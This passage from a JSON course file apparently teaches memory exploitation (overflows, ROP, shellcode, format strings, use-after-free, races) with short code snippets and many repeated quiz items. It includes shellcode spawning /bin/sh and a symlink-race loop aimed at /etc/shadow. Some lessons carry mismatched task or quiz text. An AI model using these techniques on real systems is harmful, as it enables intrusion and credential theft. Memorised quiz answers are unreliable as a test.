problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"stack-buffer-overflow","cat":"Exploitation","title":"Stack Buffer Overflow","diff":2,"xp":200,"intro":"Overwrite the return address and redirect execution.","sections":[{"type":"text","content":"Write more data than a buffer holds, overwriting the return address on the stack."},{"type":"code","lang":"python","content":"import struct\noffset = 512\neip = struct.pack('<I', 0xdeadbeef)\npayload = b'A' * offset + eip + b'x90' * 32 + shellcode"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What does a buffer overflow overwrite?","opts":["Stack pointer","Return address","Heap","BSS segment"],"ans":1},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"heap-overflow","cat":"Exploitation","title":"Heap Overflow","diff":3,"xp":250,"intro":"Corrupt heap metadata for arbitrary write.","sections":[{"type":"text","content":"Heap overflows corrupt dynamically allocated memory metadata (size, fd/bk pointers)."},{"type":"code","lang":"c","content":"char *buf = malloc(64);\nstrcpy(buf, user_input);  // no bounds check!"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What makes heap exploitation harder?","opts":["Heaps are encrypted","Must understand allocator metadata","Heap is read-only","Heap doesn't exist"],"ans":1},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"Shellcode must be position-independent because...","opts":["It runs faster","Its load address is unknown at write time","The CPU requires it","It avoids antivirus"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"rop-chains","cat":"Exploitation","title":"Return-Oriented Programming","diff":3,"xp":300,"intro":"NX blocks shellcode. ROP chains existing gadgets.","sections":[{"type":"text","content":"ROP reuses small instruction sequences (gadgets) ending with RET to build arbitrary functionality."},{"type":"code","lang":"python","content":"# ropper --file ./binary --search 'pop rdi; ret'\nrop = b'A' * offset\nrop += pack('<Q', pop_rdi_ret)\nrop += pack('<Q', binsh_addr)\nrop += pack('<Q', system_addr)"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What does ROP stand for?","opts":["Remote Object Protocol","Return-Oriented Programming","Read-Only Permission","Runtime Override"],"ans":1},{"type":"quiz","q":"A NOP sled is used to...","opts":["Increase the target area for the shellcode jump","Encrypt the payload","Compress the exploit","Speed up execution"],"ans":0},{"type":"quiz","q":"What tool generates Metasploit payloads?","opts":["nmap","msfvenom","hashcat","burpsuite"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"format-string-attacks","cat":"Exploitation","title":"Format String Vulnerabilities","diff":2,"xp":200,"intro":"printf(user_input) reads and writes arbitrary memory.","sections":[{"type":"text","content":"User input as a format string: %x reads stack, %n writes to memory."},{"type":"code","lang":"bash","content":"echo 'AAAA%08x.%08x.%08x.%08x' | nc target 1234"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"What format specifier writes to memory?","opts":["%s","%x","%n","%d"],"ans":2},{"type":"quiz","q":"Which register typically holds the return address on x86?","opts":["EAX","ESP","EIP","EBX"],"ans":2},{"type":"quiz","q":"What is a 0-day exploit?","opts":["An exploit from day zero of a project","An exploit for an unpatched/unknown vulnerability","An expired exploit","A one-day old exploit"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"shellcode-writing","cat":"Exploitation","title":"Shellcode Writing Basics","diff":3,"xp":250,"intro":"Hand-crafted assembly that spawns a shell.","sections":[{"type":"text","content":"Position-independent machine code that calls execve('/bin/sh'). Must avoid null bytes."},{"type":"code","lang":"nasm","content":"xor rsi, rsi\nxor rdx, rdx\nmov rdi, '/bin/sh'\npush rdi\nmov rdi, rsp\nmov al, 59\nsyscall"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Why avoid null bytes in shellcode?","opts":["They crash the CPU","strcpy stops at nulls, truncating the payload","They trigger AV","OS rejects them"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"use-after-free","cat":"Exploitation","title":"Use-After-Free","diff":3,"xp":250,"intro":"Freed memory still referenced. Fill the slot with controlled data.","sections":[{"type":"text","content":"A UAF occurs when freed memory is dereferenced. Allocate same-size data to reclaim the slot."},{"type":"code","lang":"c","content":"struct Object *obj = malloc(sizeof(struct Object));\nfree(obj);\n// ... later ...\nobj->handler();  // USE-AFTER-FREE"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Key condition for UAF?","opts":["Memory never allocated","Freed but pointer still dereferenced","Heap is full","Two threads access same var"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"race-conditions","cat":"Exploitation","title":"Race Condition Exploits","diff":2,"xp":200,"intro":"TOCTOU: check then use, swap in between.","sections":[{"type":"text","content":"Time-of-check to time-of-use: change state between the check and the use."},{"type":"code","lang":"bash","content":"# Symlink race\nwhile true; do ln -sf /etc/shadow /tmp/target; ln -sf /tmp/safe.txt /tmp/target; done &"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"TOCTOU stands for?","opts":["Time of Code to Update","Time of Check to Time of Use","Transfer of Control","Token of Computation"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"integer-overflow","cat":"Exploitation","title":"Integer Overflow","diff":2,"xp":150,"intro":"Math wraps around, huge allocation becomes tiny.","sections":[{"type":"text","content":"If size = user_input + header overflows, malloc allocates tiny buffer but program writes large data."},{"type":"code","lang":"c","content":"uint16_t user_len = 65530;\nuint16_t total = user_len + 10;  // wraps to 4!\nmalloc(total);  // 4 bytes\nmemcpy(buf, data, user_len);  // overflow!"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"uint8_t set to 256 becomes?","opts":["Error","0","255","Crash"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the 